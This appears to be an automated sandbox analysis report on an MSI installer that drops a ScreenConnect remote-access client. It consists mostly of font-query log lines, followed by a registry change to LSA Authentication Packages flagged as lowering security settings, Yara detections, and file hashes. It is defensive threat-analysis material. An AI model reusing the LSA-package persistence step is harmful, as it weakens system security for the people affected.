Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Code function: 6_2_0572E7C8 CreateNamedPipeW,

6_2_0572E7C8

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Code function: 6_2_01874D2F RtlGetVersion,

6_2_01874D2F

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies security policies related information

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages

Jump to behavior

Yara detected ScreenConnect Tool

Source: Yara match	File source: 7.2.ScreenConnect.WindowsClient.exe.23ffa10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.ScreenConnect.WindowsClient.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2940786358.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7716, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Installer\MSI15E7.tmp, type: DROPPED
Source: Yara match	File source: C:\Config.Msi\4c1433.rbs, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe, type: DROPPED

ID:	1543205
Product:	CloudBasic
Start time:	12:00:14
Start date:	27.10.2024
Sample:	INSPECAO-B01S.msi
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	a41d8aa583e034822c084a74eac45268
SHA1:	03e24d97759f550f5b261e552e7321db478c2ff6
SHA256:	7a004abae96e562926d9af1cf9e323de387923c24a0a6779d343b64537c4cc1b
Filetype:	Microsoft Windows Installer (60509/1) 57.88%

Name	Type	MD5	SHA1	SHA256
C:\Config.Msi\4c1433.rbs	data	5213019BDBC956CBD60611D6DAE632C1	6BFD731A07183457C755070B4C1184F121148458	79E945A332F85DC8D33FCD03B7D8F3FF69AC7BD07196968193A87EB74C2A4724
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\Client.en-US.resources	data	511202ED0BA32D7F09EAB394C917D067	DBD611720FD1730198F72DEC09E8E23E6D6488F8	F8398A235B29AF6569F2B116E0299B95512D042F5A4CD38C98C79729A5FBDB9D
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\Client.resources	data	5CD580B22DA0C33EC6730B10A6C74932	0B6BDED7936178D80841B289769C6FF0C8EEAD2D	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	F311A8217807F6C85817058522E234A2	CEB586B3CF7B0EE86EA8242D9B3D8641C9444CD1	032450CD037D9E0EEC49E0B4FF44073D539775633FB4AF6FD76D4CB19116AAC9
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	3FF07C657068430EF677181D1F67066D	37F7E9D2CCB65B4EA2733393015635EA1B43393E	D17CF13612039F6A4CA17B56C32399CCBE279A499C8D2F8E910B1FD6F4FFF2B1
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	PE32 executable (GUI) Intel 80386, for MS Windows	826314610D9E854477B08666330940B5	65B601D60042CF6F263CD38AC2F63CD06A9DE159	E54963CB63C9E471E2D3D59E55E4C7AEEDCCAFDD616B99C4B3AF230608E4BCC9
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	3B1BA4BEBEFDC8A95B0F2F0B4E50C527	15551D2E8BFB829F3A96D161B43DE820C0D417CE	A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	D196174CF03F86C8776E717F07D5D19F	BBD2C6A59229B3E4EC7C5742248F3F55A61DD216	A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsAuthenticationPackage.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	5ADCB5AE1A1690BE69FD22BDF3C2DB60	09A802B06A4387B0F13BF2CDA84F53CA5BDC3785	A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsBackstageShell.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	C1F206B0C0058DC4CC7B9F3125F61E20	541A1564799DA24C48BE188888F306381EF23728	94E711FD79FC81084FB222FF927893669DDBA9890C6622DD4981FB5766438A63
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsBackstageShell.exe.config	XML 1.0 document, ASCII text, with CRLF line terminators	728175E20FFBCEB46760BB5E1112F38B	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	AB5FA8D90645878D587F386D0E276C02	A602A20735A1104851F293965F1FE4AB678BF627	316BBF433F1F803D113ADF060C528CCC636656CEE26B90F5FEA011C1C73C7D16
C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe.config	XML 1.0 document, ASCII text, with CRLF line terminators	728175E20FFBCEB46760BB5E1112F38B	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
